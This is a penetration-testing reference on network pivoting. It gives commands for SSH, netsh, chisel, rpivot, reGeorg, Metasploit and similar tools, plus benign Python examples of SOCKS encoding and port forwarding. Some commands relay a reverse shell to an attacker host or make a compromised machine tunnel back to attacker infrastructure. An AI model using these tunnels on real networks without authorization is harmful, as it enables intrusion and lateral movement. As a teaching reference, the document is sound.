Network Pivoting Techniques
Summary
- SOCKS Compatibility Table
- Windows netsh Port Forwarding
- SSH
- SOCKS Proxy
- Local Port Forwarding
- Remote Port Forwarding
- Proxychains
- Graftcp
- Web SOCKS - reGeorg
- Web SOCKS - pivotnacci
- Metasploit
- Empire
- sshuttle
- chisel
- SharpChisel
- gost
- Rpivot
- RevSocks
- plink
- ngrok
- Capture a network trace with builtin tools
- Basic Pivoting Types
- References
SOCKS Compatibility Table
| SOCKS Version | TCP | UDP | IPv4 | IPv6 | Hostname |
|---------------|-----|-----|------|------|----------|
| SOCKS v4 | ✅ | ❌ | ✅ | ❌ | ❌ |
| SOCKS v4a | ✅ | ❌ | ✅ | ❌ | ✅ |
| SOCKS v5 | ✅ | ✅ | ✅ | ✅ | ✅ |
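To make the table concrete, here is an added example (not from the original cheat sheet or any of the tools it lists) in Python that builds the CONNECT request each SOCKS version puts on the wire and decodes a SOCKS5 reply. It shows why SOCKS4 rejects hostnames and IPv6 outright, how SOCKS4a smuggles a hostname behind a 0.0.0.x address, and how SOCKS5 carries all three address types. Destination names, ports and the sample reply are constructed test values.

```python
import ipaddress
import socket
import struct

# Added example, not part of the original cheat sheet: CONNECT requests for
# SOCKS4, SOCKS4a and SOCKS5 as defined in the protocol specs, plus a SOCKS5
# reply decoder and a helper that opens a TCP connection through a no-auth
# SOCKS5 proxy (such as the listener created by ssh -D).

CONNECT = 0x01                              # CMD/CD value for a TCP connect
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
SOCKS5_GREETING_NOAUTH = b"\x05\x01\x00"     # VER=5, one method offered: no auth


def classify(host):
    """Return ("ipv4" | "ipv6" | "hostname", raw bytes) for a destination."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname", host.encode("idna")
    return ("ipv4" if ip.version == 4 else "ipv6"), ip.packed


def socks4_connect(host, port, userid=b""):
    """SOCKS4: VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL. IPv4 only."""
    kind, raw = classify(host)
    if kind != "ipv4":
        raise ValueError("SOCKS4 cannot carry a %s destination" % kind)
    return struct.pack("!BBH4s", 4, CONNECT, port, raw) + userid + b"\x00"


def socks4a_connect(host, port, userid=b""):
    """SOCKS4a: same layout, but DSTIP 0.0.0.x (x != 0) signals that a
    NUL-terminated hostname follows USERID for the proxy to resolve."""
    kind, raw = classify(host)
    if kind == "ipv4":
        return socks4_connect(host, port, userid)
    if kind == "ipv6":
        raise ValueError("SOCKS4a cannot carry an IPv6 destination")
    head = struct.pack("!BBH4s", 4, CONNECT, port, b"\x00\x00\x00\x01")
    return head + userid + b"\x00" + raw + b"\x00"


def socks5_connect(host, port):
    """SOCKS5: VER=5, CMD=1, RSV=0, ATYP, DST.ADDR, DST.PORT."""
    kind, raw = classify(host)
    if kind == "ipv4":
        addr = bytes([ATYP_IPV4]) + raw
    elif kind == "ipv6":
        addr = bytes([ATYP_IPV6]) + raw
    else:
        addr = bytes([ATYP_DOMAIN, len(raw)]) + raw   # length-prefixed name
    return struct.pack("!BBB", 5, CONNECT, 0) + addr + struct.pack("!H", port)


def parse_socks5_reply(data):
    """Decode VER REP RSV ATYP BND.ADDR BND.PORT into (rep, addr, port).
    REP 0x00 means success; any other value is a proxy-side failure."""
    ver, rep, _rsv, atyp = struct.unpack("!BBBB", data[:4])
    if ver != 5:
        raise ValueError("not a SOCKS5 reply")
    if atyp == ATYP_IPV4:
        addr, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
    elif atyp == ATYP_IPV6:
        addr, rest = str(ipaddress.IPv6Address(data[4:20])), data[20:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        addr, rest = data[5:5 + n].decode(), data[5 + n:]
    else:
        raise ValueError("unknown ATYP %#x" % atyp)
    return rep, addr, struct.unpack("!H", rest[:2])[0]


def socks5_open(proxy, dest, timeout=5):
    """Open a TCP connection to dest=(host, port) through a no-auth SOCKS5
    proxy=(host, port). Returns the connected socket, ready for the app data."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(SOCKS5_GREETING_NOAUTH)
    if s.recv(2) != b"\x05\x00":                 # server must pick "no auth"
        s.close()
        raise ConnectionError("proxy refused the no-auth method")
    s.sendall(socks5_connect(*dest))
    rep, _addr, _port = parse_socks5_reply(s.recv(262))   # largest reply size
    if rep != 0:
        s.close()
        raise ConnectionError("SOCKS5 CONNECT failed, REP=%d" % rep)
    return s


if __name__ == "__main__":
    # Constructed destinations: one of each kind from the table
    for name, fn in (("v4", socks4_connect), ("v4a", socks4a_connect), ("v5", socks5_connect)):
        for dest in ("10.1.1.110", "intranet.local", "::1"):
            try:
                print(name, dest, fn(dest, 3389).hex())
            except ValueError as e:
                print(name, dest, "unsupported:", e)
```

The practical reading of the table: if the tool on the attacker side resolves names before it connects (the default in proxychains without proxy_dns), a socks4 entry is enough, but internal hostnames that only the pivot can resolve need SOCKS4a or SOCKS5, and UDP (DNS lookups, SNMP, some scanners) needs SOCKS5 UDP ASSOCIATE support, which ssh -D does not provide.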
Windows netsh Port Forwarding
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
Forward port 4545 (reverse shell) and port 80 (HTTP server) from the pivot host to the attacker at 192.168.50.44:
netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
Open the listening ports in the Windows firewall. The dir=in rules are the ones that matter; the dir=out rules are usually redundant, because Windows allows outbound traffic by default and the proxy's outgoing connection uses an ephemeral source port rather than localport.
netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
listenaddress: local IP address the proxy listens on (when omitted, as in the 4545 and 80 rules above, it listens on all local addresses).
listenport: local TCP port the proxy listens on.
connectaddress: local or remote IP address (or DNS name) the incoming connection is redirected to.
connectport: TCP port on connectaddress that the connection from listenport is forwarded to.
portproxy needs administrator rights and the IP Helper service (iphlpsvc), relays TCP only (no UDP), and stores its entries in the registry so they survive reboots: list them with `netsh interface portproxy show all` and remove them with the matching `netsh interface portproxy delete v4tov4` once the engagement is over.
SSH
SOCKS Proxy
ssh -D8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
-f: send ssh to the background once the connection is established
-N: do not execute a remote command (forwarding only)
-D: dynamic forwarding, i.e. a SOCKS4/SOCKS5 listener on the given local port (bound to 127.0.0.1 unless a bind address is given); every connection made through it originates from the SSH server's side of the network
Cool Tip: Konami SSH port forwarding. Forwards can be added to a live session without reconnecting: press [ENTER] then ~C to open the ssh> command line and type, for example, -D 1090 (a -L or -R specification works the same way). This requires a tty and the escape character not being disabled.
Local Port Forwarding
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
The SSH client listens on bindaddr:port; each connection is carried to the SSH server, which opens dsthost:dstport from its own network, so dsthost is resolved and reached from the server's side.
Remote Port Forwarding
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
The SSH server listens on bindaddr:port; each connection is carried back to the client, which opens localhost:localport from its own network. This is the direction to use when the pivot can reach the attacker but the attacker cannot reach the pivot.
ssh -R 3389:10.1.1.224:3389 root@10.11.0.32
Exposes 10.1.1.224:3389 (reachable from the machine running ssh) on port 3389 of 10.11.0.32. sshd binds remote forwards to loopback only unless GatewayPorts is enabled in sshd_config, so by default only processes on 10.11.0.32 itself can reach the forwarded port.
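Every forwarder on this page (netsh portproxy, ssh -L and -R, meterpreter portfwd, chisel) does the same job: accept on a listen address and port, connect to a destination, and copy bytes in both directions until each side closes. As an added example, not code from the original cheat sheet or from any of those tools, here is that relay in Python with the same four parameters as netsh portproxy. A constructed echo server stands in for the internal service so the relay can be exercised on loopback; every address and port below is a local test value.

```python
import socket
import threading

# Added example, not from the original cheat sheet: a minimal TCP port
# forwarder (listenaddress/listenport -> connectaddress/connectport). Like
# portproxy and ssh -L/-R it relays TCP only; UDP is not handled.


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the far end
    sees the EOF too (this is what makes half-closed connections work)."""
    try:
        while True:
            chunk = src.recv(65536)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client, connect_addr, connect_port):
    """Connect to the destination and run one pump per direction."""
    try:
        upstream = socket.create_connection((connect_addr, connect_port), timeout=5)
    except OSError:
        client.close()        # destination unreachable: drop the client
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


class Forwarder:
    """Listen on (listen_addr, listen_port) and relay every connection to
    (connect_addr, connect_port). listen_port=0 picks a free port."""

    def __init__(self, listen_addr, listen_port, connect_addr, connect_port):
        self.connect_addr, self.connect_port = connect_addr, connect_port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((listen_addr, listen_port))
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                client, _ = self.sock.accept()
            except OSError:
                return            # listener closed
            threading.Thread(target=_relay, daemon=True,
                             args=(client, self.connect_addr, self.connect_port)).start()

    def close(self):
        self.sock.close()


def _echo(conn):
    _pump(conn, conn)             # send back whatever arrives, until EOF
    conn.close()


class EchoServer:
    """Constructed stand-in for the internal service behind the pivot."""

    def __init__(self, addr="127.0.0.1"):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((addr, 0))
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except OSError:
                return
            threading.Thread(target=_echo, args=(conn,), daemon=True).start()

    def close(self):
        self.sock.close()


def roundtrip(addr, port, payload, timeout=5):
    """Send payload, half-close, and return everything the far end sends back."""
    with socket.create_connection((addr, port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while True:
            chunk = s.recv(65536)
            if not chunk:
                return out
            out += chunk


if __name__ == "__main__":
    svc = EchoServer()
    fwd = Forwarder("127.0.0.1", 0, "127.0.0.1", svc.port)
    print(roundtrip("127.0.0.1", fwd.port, b"hello through the forwarder"))
    fwd.close()
    svc.close()
```

The listening end is the only thing that changes between the techniques: with ssh -L and netsh portproxy the Forwarder sits where the attacker connects in, with ssh -R the listener is created on the far end and the connection is carried back over the existing session. Binding the listener to 0.0.0.0 exposes it to every host that can reach that interface, which is the reason sshd defaults to loopback for remote forwards.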
Proxychains
Config file: /etc/proxychains.conf (proxychains-ng reads /etc/proxychains4.conf). Point the proxy list at the SOCKS listener, for example the one opened with ssh -D:
[ProxyList]
socks4 localhost 8080
Run a tool through the proxy:
proxychains nmap -sT 192.168.5.6
Only TCP connections made through the libc socket calls are proxied, so scan with full connects (-sT) and skip host discovery (-Pn): SYN scans, ICMP and UDP never enter the SOCKS tunnel. A socks4 entry cannot pass hostnames to the proxy; use socks5 (ssh -D speaks both) together with proxy_dns when names must be resolved on the far side. Statically linked binaries, which includes most Go tools, ignore the LD_PRELOAD hook entirely; that is the gap Graftcp below fills.
Graftcp
A flexible tool for redirecting a given program's TCP traffic to a SOCKS5 or HTTP proxy.
⚠ Same purpose as proxychains, but it proxifies by tracing the program with ptrace instead of LD_PRELOAD, so it also works for statically linked binaries such as Go applications.
Create a SOCKS5 proxy on the victim with Chisel (or another tool) and bring it back to the attacker through SSH:
# Attacker: local port 1080 -> port 1080 on the VPS, where chisel exposes the reverse SOCKS listener
ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS
# VPS: chisel server that accepts reverse tunnels from clients
./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse
# Victim 1: connect back and open a reverse SOCKS5 listener on the VPS (port 1080 by default)
./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks
--tls-skip-verify turns off certificate checking on the victim side; pin the server with --fingerprint or use a certificate the client trusts so nobody can sit in the middle of the tunnel.
Run graftcp-local pointed at that SOCKS5 listener, then launch the target program under graftcp:
graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080
graftcp ./nuclei -u http://172.16.1.24
Simple configuration file for graftcp:
listen = :2233
loglevel = 1
socks5 = 127.0.0.1:1080
# socks5_username = SOCKS5USERNAME
# socks5_password = SOCKS5PASSWORD
select_proxy_mode = auto
Web SOCKS - reGeorg
reGeorg, the successor to reDuh: drop one of its tunnel scripts on a compromised web server (typically a bastion in the DMZ) and it turns the HTTP(S) channel to that server into a SOCKS proxy into the internal network.
Drop one of the following files on the server:
tunnel.ashx
tunnel.aspx
tunnel.js
tunnel.jsp
tunnel.nosocket.php
tunnel.php
tunnel.tomcat.5.jsp
Command
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
The -u URL must point at the tunnel script you dropped; the local SOCKS listener (port 8080 here) can then be used through proxychains. Optional arguments:
-h, --help: show this help message and exit
-l, --listen-on: the default listening address
-p, --listen-port: the default listening port
-r, --read-buff: local read buffer, max data to be sent per POST
-u, --url: the URL containing the tunnel script
-v, --verbose: verbose output [INFO|DEBUG]
Web SOCKS - pivotnacci
pivotnacci, a tool to make SOCKS connections through HTTP agents.
Installation
pip3 install pivotnacci
Command
pivotnacci https://domain.com/agent.php --password "s3cr3t"
pivotnacci https://domain.com/agent.php --polling-interval 2000
Metasploit
Meterpreter list active port forwards
portfwd list
Add port forwards (local forward: the attacker listens on -l and the session connects to -r:-p)
portfwd add -l 3389 -p 3389 -r target-host
portfwd add -l 88 -p 88 -r 127.0.0.1
# -L sets the local bind address; 0.0.0.0 exposes the forward to other hosts
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
Delete port forwards
portfwd delete -l 3389 -p 3389 -r target-host
# Meterpreter delete all port forwards
portfwd flush
Use Meterpreter's autoroute script to route a subnet through the current session
run autoroute -s 192.168.15.0/24
Meterpreter view available networks
run autoroute -p
Add/delete a route from the msfconsole prompt (the last argument is the session ID used as the gateway)
route add 192.168.14.0 255.255.255.0 3
route delete 192.168.14.0 255.255.255.0 3
# msfconsole delete all routes
route flush
Routes only apply to Metasploit modules; to reach the routed subnet with external tools, start auxiliary/server/socks_proxy and point proxychains at its listener.
Empire
(Empire) > socksproxyserver
(Empire) > use module management/invoke_socksproxy
(Empire) > set remoteHost 10.10.10.10
(Empire) > run
sshuttle
Transparent proxy that works as a poor man's VPN: it captures traffic for the chosen subnets with local iptables/pf rules and carries it over an SSH connection to the pivot host.
- Needs root locally (to install the redirect rules) but no admin rights on the pivot: a normal SSH account with Python is enough, and nothing is left installed there.
- Works with Linux and macOS clients.
- Can also carry DNS through the tunnel (--dns).
Installation
pacman -Sy sshuttle
apt-get install sshuttle
Command
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24
# -r: the SSH pivot; the trailing CIDRs are routed through it (0/0 routes everything)
Using a private key
sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
Exclude networks
# -x: exclude a subnet from the tunnel, e.g. -x <subnet>/<prefix>; useful to keep the pivot's own address out of the redirect rules
chisel
go install github.com/jpillora/chisel@latest
Start the server (--reverse lets clients ask the server to open listeners on its side)
./chisel server --reverse --port 8080
Start the client
./chisel client example.com:8080 R:localhost:8000:8000
R:localhost:8000:8000 makes the server listen on localhost:8000 and relay to localhost:8000 on the client; without the R: prefix the client listens and the server connects out. R:socks opens a reverse SOCKS5 listener on the server instead (port 1080 by default). The tunnel is HTTP/WebSocket, so it passes most egress proxies; protect it with --auth user:pass on both ends and pin the server with --fingerprint on the client so an attacker-in-the-middle cannot impersonate it.
SharpChisel
A .NET implementation of chisel.
Commands
- Server:
SharpChisel.exe server -p 8080
- Client:
SharpChisel.exe client -server <serverIP>:8080 -reverse -r localhost:8000:8000
gost
Go-based tunneling application that chains several transports and exposes, among others, a SOCKS5 proxy: -L sets the local listener (HTTP and SOCKS4/5 auto-detected when no scheme is given), -F the next hop to forward through.
go install github.com/ginuerzh/gost/cmd/gost@latest
Command
gost -L=:8080 -P=10.0.0.1:8080
gost -L=:8080 -F=ssh://user:password@hostname:port
Rpivot
A reverse SOCKS4 proxy written in Python (github.com/klsecservices/rpivot): the server runs on the attacker's machine, the client runs on the compromised host and connects back, and the server then exposes a local SOCKS port that tunnels into the client's network.
git clone https://github.com/klsecservices/rpivot
Commands
# Attacker: accept the client on 9999 and expose SOCKS on 1080
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
# Compromised host: connect back to the attacker
python client.py --server-ip <attacker_ip> --server-port 9999
RevSocks
RevSocks is a reverse SOCKS5 proxy with TLS support: the client on the compromised host connects back to the server, which then exposes a local SOCKS listener into the client's network.
Usage
plink
PuTTY's command-line SSH client. Being a single Windows binary with no install, it is the usual way to set up SSH port forwards from a compromised Windows host; it is a client only and connects to an SSH server you control.
Usage
plink.exe -ssh -L 8080:127.0.0.1:80 user@host
Same semantics as ssh -L: port 8080 on the Windows host is relayed to 127.0.0.1:80 as seen from the SSH server. Use -R to expose a port of the Windows host (or anything it can reach) on your SSH server, -N to skip the remote shell, and -batch so that prompts such as the host-key confirmation fail instead of hanging a non-interactive session.
ngrok
Create a tunnel
ngrok tcp 22
Run a web server
ngrok http 80
ngrok publishes a local port on a public ngrok endpoint, which helps when the attacker has no routable address, but all traffic transits ngrok's infrastructure and the endpoint is reachable by anyone who learns its name: check the rules of engagement before relaying client data through a third party.
Capture a network trace with builtin tools
Windows
- Wireshark: GUI application for capturing packets, but not builtin; it has to be installed on the host.
- Netsh: netsh trace start capture=yes starts a capture (add tracefile= to choose the output .etl path) and netsh trace stop ends it. The resulting .etl file is not readable by Wireshark as-is; convert it with Microsoft's etl2pcapng.
Linux
Basic Pivoting Types
Local Pivoting: a local port forward (ssh -L, netsh portproxy, meterpreter portfwd): the attacker connects to a listener and the compromised host opens the connection to the internal resource on their behalf.
Remote Pivoting: a remote or reverse forward (ssh -R, chisel R:, reverse SOCKS tools): the compromised host initiates the connection out to the attacker, which works even when the attacker cannot reach the host directly.
VPN Pivoting: a layer-3 tunnel (sshuttle or a real VPN) that routes entire subnets through the compromised host, so every tool works unchanged instead of needing a per-port forward or SOCKS support.
References
This guide aims to provide a concise overview of various techniques and tools for network pivoting. For detailed documentation, please refer to the respective project repositories or manuals.